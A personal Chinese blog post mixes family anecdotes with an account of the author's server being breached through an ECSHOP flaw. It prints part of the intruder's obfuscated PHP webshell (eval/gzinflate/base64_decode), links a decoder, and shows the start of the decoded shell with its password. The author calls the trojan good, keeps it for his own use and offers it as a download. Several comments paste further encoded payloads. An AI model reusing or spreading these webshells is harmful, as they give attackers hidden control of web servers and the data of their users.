eval、gzinflate、 base64_decode三函数加密的代码在线解密

其实,这边日志的主题不是想写被eval、gzinflate、 base64_decode三函数加密的代码的在线解密的。主要写生活中的两三件事。

其一,刘威同学生了个儿子,在这里恭喜一下。俺又多了个侄子,年底回家,连他结婚的喜酒,跟小侄子的见面礼一并给了。(此人已经生子,还未结婚,大家一起来鄙视一下,当然,你也可以羡慕一下。)团队的SCY已经有两个孩子了,一个女儿一个儿子,岁月不饶人啊,哥老了。

其二,前天下午听姐姐说晚上跟今天早上,还有中午打电话回家,都没人接听。我听了之后,有点心慌,也假装镇定到下班回家,先是打了电话到大姐家,接电话的是外甥,其也说也曾经尝试了几次,也是没接通,然后,决定明天去我父母家看望一下(中考完毕),顺便带点农副产品。我听了之后,却愈加担心,也有点欣慰。担心的是家里的电话为什么没人接,欣慰的是外甥很懂事了,也很孝顺他的姥姥,也就是我的父母。接着,我又尝试几遍,仍未有响应。又打了一通电话,后得知家里电话坏了,才放下心来。继续坚持每周一个电话回家。

其三,天气渐热,把去年买的风扇拿出来。安装了一下,发现扇叶以及其他部件都是崭新、一尘不染的,遂不住赞叹自己当初认真清理打扫,收藏放置的态度。

其四,放BLOG的服务器,被入侵了。入口是ECSHOP的BUG引起的。俺也没啥说的,只想对这位“大侠”说:“你爱干吗就干吗,只要别删数据,要是挂黑页,证明你的能力的话,那记得帮俺备份一下,拜谢了”。接着说,顺便发现了其使用的PHP木马,打开看了下源码,加密了。其加密方式为
eval(gzinflate(base64_decode(这种的,见下面代码:

?><?php
eval(gzinflate(base64_decode('HJ3HbuRalkXn9SP1AA7oHdDoAr0NegbNpEDvvefXd6hzkkhJKYV4z9l7rZBE/ed//+c/cz3/61/FmfT/VG8zln2yF/+kyVYQ2H/zIpvy4p9/yyoqp8eeDV040q4OM/d1qQTvsEU0xdNc+wNvmqU1BwhZMTWeIY9ivWSJBrMygUAOgkAGZi8KEjAoDqUHfiXq7UfkEUGge76Rjcjgq8zng800+DxTsk+Hx4swwfTMtXA4XmTGlrElQx2AqB12GwLT/Sz8AaDd1s602lxYoksdwdnaqUGCvfucXfefhFU/

大体代码就这样,没贴完,费了1个多小时,写了解密代码程序,见http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php,方便大家用得到的时候用下。
顺便说下,此PHP木马程序加密了9次左右吧,解密之后的代码为

?><?php
$password = "wx";
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
set_time_limit(0);
function Root_GP(&$array)
{
	while(list($key,$var) = each($array))
	{
		if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
		{
			if(is_string($var)) $array[$key] = stripslashes($var);
			if(is_array($var)) $array[$key] = Root_GP($var);
		}
	}
	return $array;
}

function Root_CSS()
{

哦…..这哥们的密码居然就两位字母,就是wx ,这一不小心还能按对。。PS:这木马不错,留着自己用了。打包在下面,想用的可以拿去。
无图无真相,上图。

艹,Wordpress不能上传了,提示”临时文件夹丢失。”好吧,好吧,我先写周报,等会再调试。

搞定了,gleon调试,把php.ini中的upload_tmp_dir配置项去掉了,开启之后,给相应目录足够权限即可,比如755.

附件:php木马加密前与加密后的两个文件打包

下面上图

eval、gzinflate、 base64_decode三函数加密的代码的在线解密

eval、gzinflate、 base64_decode三函数加密的代码的在线解密

eval、gzinflate、 base64_decode三函数加密的代码的在线解密

eval、gzinflate、 base64_decode三函数加密的代码的在线解密

知识共享许可协议CFC4N的博客CFC4N 创作,采用 署名—非商业性使用—相同方式共享 4.0 进行许可。基于https://www.cnxct.com上的作品创作。转载请注明转自:eval、gzinflate、 base64_decode三函数加密的代码在线解密

11 thoughts on “eval、gzinflate、 base64_decode三函数加密的代码在线解密

  1. <?php
    eval(gzinflate(base64_decode('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')));
    ?>

    您好,别的都可以解, 这段怎么解不了呢? 等您的回复,谢谢!

  2. 您好,别的都可以解, 这段怎么解不了呢? 等您的回复,谢谢!

  3. &lt;?php
    eval(gzinflate(base64_decode(&#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7KYaUJR Gs981sf2zbKs7Se30jBle3/e04B1V1GY Fgld6ZiUshL0w/VII7KUDwhhvO1UzF7ezcS/OIooJteIJHEIT9iapqh4AfwmOHU4NkM1mfKquv7NvN7gNxfRpZP 8YLPWsFcGJ36dES4Zl5HYOd7U9hPKprhWMjNVRTQQm4 fDJQmJBWbQd3Wj9immgDwyHxd1E5GLB5Ew7ofdkWfiNq8VIY6FOW NPwgftCAdtn3paC4ffdsJmnBU/Gcbs7XB7IvsM58AXxnwoeSDUI6J2jorLw9KPlwg3QMkll6osykMNomRf EVUSOcvB/aXsRjFu1yVVvoFIreonj3YSU35dVKjVUd6bnvymYrkJJ7L0t1ZhRCknaTVtWWBzGNhM1HCdgxkIklTmkBb17ZKNDmN016U3tvEnCywbK6FPY8GUfFx597vQk8Dzof2oJsilbXIUrcH78b3b7BlJrXDeFXOXz7k6yJtNpI32IDEkgTuvxYCCcVAzB1MEzvhJzYAwVCekj5fucQOtMf92HwKON1qf mv4xTlpNNfyfK4wz74mDtr0Uev/NrqXI9VPhqI2eUDFoIBu8hBqqYkt/jvj12R2halV5SsshNlep2kzEGJdPIO6BkdEQhb7ug0HKsAxiNsZ3YWe9qopgTWa/WEcNxnfOwkdhHD1HFBkzbr08EQYw34OO4D2fKxvt4t7DORIYxqHCAlKVkDJ4nJRpXZAwvA0j95xFsx9r4LC1/RtT5oOMbEzx4MIxtAb bGvXIjV/ WpjwgNrnQNU7Z6ATQpLw2E88PfVGrtzys93UOt8WVdGN4fDvoX4bIL/F90sfpWY6DFIfmuN/vFZdJvxFRJFlvI9bAMwrrLuZt Dh/sFPp3O7EjmL9pjr05BPUGT71q4GkjM32uSSP1cuQ41TPQ4UyYkfB9h2KdfDk0efZSAf6klt2s9NsS1 kIfU3d78OpAs/bw/pThWqF/98RMpp7i/0OjvHcXcDqTAs1ie72BZHljNj5U4UZJ/tdPRzB6CnHxWdmIgls3V3E6tAlBBxgGeNSFxpmEsRi4EGbepV8ms6Bf25V3g6XfuQfoJkuZZrAs4E2oAMP1IzFJuo11bRbwzgO5xLiTLvSyUEl6jkbHM/lc2KEV3CHNVmcxYFDOVeWrSNM57sbu4tEdscQSkn5OxomHCzuaAsElY4p5gsJ5nT6sF/sFkuzjswJ pmId n86Z32jKE2c/Qk8ai8kQc yj83OljP2sdYfEs2dG39E/MslNqWp3FwG764RO5xse/2Zhz6e35aPQMEC 1M7aZtMEs1ZH0wRkE2nlmZ5lOnYwP44BKAy8qV6xA783A5qrM6HT/SiOS5cQNQdIh8TfTEivgBqRoLKPaSQeZlrg21lg/YLCBqj9pkGf6uMxa2zXkhHmrDz/KGFzwLHz1jEj3KKh9UVN9MirxflTp6VdiGVwrFqi9mCrcRaYKpfBUpuDBa7aZr3gcYz50d7SofbFHpBbUeBGnKGcMaLSAhrazix0P3SiT0RMTLW9tDY 7LGoB/2GTbf0ZZoeWkAtJYH/ebSAEfRsAgcjeoQ2gqtpd2zp3VB0UfwAK0sK1z42BOEk Z1QLwrj4zjeD8PMvqEB77Clex3FjfdM7L93rlEhGxfgg0gD4rvOfwgMbt8B1HysI7O3Kc1MB4aIEPakacETp45CsyqqB9R2G/uhEcjasYHublIYahYs9lfpQQcQ07xkb5N/agttDNTFOLXA8H34ARRME16Ulk9m89giX8cflQrxv4T8O1111um2kyrxEJamgVPupGhNcKnk0X7hI3omqmcPaFCGff5gb8niLgcrv579Tm0zGijPcTCnUh5tjDJ0QQ/K0X9kmH4aO AuvfCV2vCZjhFu23XdB/UzHJdKvmL9iLZGHp45KDqTsdt1ckAkPDV218l5walQUmDQntQwukAFVntHwn961Smbo5eZLXJSX/5Lv1SEsVLSDNbv47dbVAebW9nm5i6U2ZzpSsnleFvKnrGBwntxTcrU5XNbJzXrvHN802D4wAbLny1SaV2oAb7PFeU0 sJXXkZ Q/cFhh6CZcQ3VFf00ZGPFbzlvGbR0k1UCeASdYtx hK2O FDB4om5Wk1RYQPv3lCXMNavTtWl2EccozDsrMNQQUMVhL7vC0FQQ/33P// ///T8=&#039;)));
    ?&gt;

    您好,别的都可以解, 这段怎么解不了呢? 等您的回复,谢谢!

  4. &amp;lt;?php
    eval(gzinflate(base64_decode(&amp;#039;DZW3roRaokQ/Z 7VDoDG62kCvPemgWSE9942X/9OXtGqparySod/6redqiE9yn ydC8J7H9Fmc9F c9/ MJB BOWmJ53cc9zOcp4tX5pkjFGldd4Syh6C5TLcmrf5Io4LzRdm8uZIYr0rtx3oScc7KYaUJR Gs981sf2zbKs7Se30jBle3/e04B1V1GY Fgld6ZiUshL0w/VII7KUDwhhvO1UzF7ezcS/OIooJteIJHEIT9iapqh4AfwmOHU4NkM1mfKquv7NvN7gNxfRpZP 8YLPWsFcGJ36dES4Zl5HYOd7U9hPKprhWMjNVRTQQm4 fDJQmJBWbQd3Wj9immgDwyHxd1E5GLB5Ew7ofdkWfiNq8VIY6FOW NPwgftCAdtn3paC4ffdsJmnBU/Gcbs7XB7IvsM58AXxnwoeSDUI6J2jorLw9KPlwg3QMkll6osykMNomRf EVUSOcvB/aXsRjFu1yVVvoFIreonj3YSU35dVKjVUd6bnvymYrkJJ7L0t1ZhRCknaTVtWWBzGNhM1HCdgxkIklTmkBb17ZKNDmN016U3tvEnCywbK6FPY8GUfFx597vQk8Dzof2oJsilbXIUrcH78b3b7BlJrXDeFXOXz7k6yJtNpI32IDEkgTuvxYCCcVAzB1MEzvhJzYAwVCekj5fucQOtMf92HwKON1qf mv4xTlpNNfyfK4wz74mDtr0Uev/NrqXI9VPhqI2eUDFoIBu8hBqqYkt/jvj12R2halV5SsshNlep2kzEGJdPIO6BkdEQhb7ug0HKsAxiNsZ3YWe9qopgTWa/WEcNxnfOwkdhHD1HFBkzbr08EQYw34OO4D2fKxvt4t7DORIYxqHCAlKVkDJ4nJRpXZAwvA0j95xFsx9r4LC1/RtT5oOMbEzx4MIxtAb bGvXIjV/ WpjwgNrnQNU7Z6ATQpLw2E88PfVGrtzys93UOt8WVdGN4fDvoX4bIL/F90sfpWY6DFIfmuN/vFZdJvxFRJFlvI9bAMwrrLuZt Dh/sFPp3O7EjmL9pjr05BPUGT71q4GkjM32uSSP1cuQ41TPQ4UyYkfB9h2KdfDk0efZSAf6klt2s9NsS1 kIfU3d78OpAs/bw/pThWqF/98RMpp7i/0OjvHcXcDqTAs1ie72BZHljNj5U4UZJ/tdPRzB6CnHxWdmIgls3V3E6tAlBBxgGeNSFxpmEsRi4EGbepV8ms6Bf25V3g6XfuQfoJkuZZrAs4E2oAMP1IzFJuo11bRbwzgO5xLiTLvSyUEl6jkbHM/lc2KEV3CHNVmcxYFDOVeWrSNM57sbu4tEdscQSkn5OxomHCzuaAsElY4p5gsJ5nT6sF/sFkuzjswJ pmId n86Z32jKE2c/Qk8ai8kQc yj83OljP2sdYfEs2dG39E/MslNqWp3FwG764RO5xse/2Zhz6e35aPQMEC 1M7aZtMEs1ZH0wRkE2nlmZ5lOnYwP44BKAy8qV6xA783A5qrM6HT/SiOS5cQNQdIh8TfTEivgBqRoLKPaSQeZlrg21lg/YLCBqj9pkGf6uMxa2zXkhHmrDz/KGFzwLHz1jEj3KKh9UVN9MirxflTp6VdiGVwrFqi9mCrcRaYKpfBUpuDBa7aZr3gcYz50d7SofbFHpBbUeBGnKGcMaLSAhrazix0P3SiT0RMTLW9tDY 7LGoB/2GTbf0ZZoeWkAtJYH/ebSAEfRsAgcjeoQ2gqtpd2zp3VB0UfwAK0sK1z42BOEk Z1QLwrj4zjeD8PMvqEB77Clex3FjfdM7L93rlEhGxfgg0gD4rvOfwgMbt8B1HysI7O3Kc1MB4aIEPakacETp45CsyqqB9R2G/uhEcjasYHublIYahYs9lfpQQcQ07xkb5N/agttDNTFOLXA8H34ARRME16Ulk9m89giX8cflQrxv4T8O1111um2kyrxEJamgVPupGhNcKnk0X7hI3omqmcPaFCGff5gb8niLgcrv579Tm0zGijPcTCnUh5tjDJ0QQ/K0X9kmH4aO AuvfCV2vCZjhFu23XdB/UzHJdKvmL9iLZGHp45KDqTsdt1ckAkPDV218l5walQUmDQntQwukAFVntHwn961Smbo5eZLXJSX/5Lv1SEsVLSDNbv47dbVAebW9nm5i6U2ZzpSsnleFvKnrGBwntxTcrU5XNbJzXrvHN802D4wAbLny1SaV2oAb7PFeU0 sJXXkZ Q/cFhh6CZcQ3VFf00ZGPFbzlvGbR0k1UCeASdYtx hK2O FDB4om5Wk1RYQPv3lCXMNavTtWl2EccozDsrMNQQUMVhL7vC0FQQ/33P// ///T8=&amp;#039;)));
    ?&amp;gt;

    您好,别的都可以解, 这段怎么解不了呢? 等您的回复,谢谢!

  5. 请问楼主php木马加密前与加密后的两个文件打包
    这个 运行的时候要输入的密码是多少啊? :lol:

  6. 你好,我的wordpress站所有的主题文件,所有的index.php,不管是wp的还是其它的都被感染类似代码,请问你知道这是wordpress的哪方面漏洞吗,谢谢,在线等,急

Comments are closed.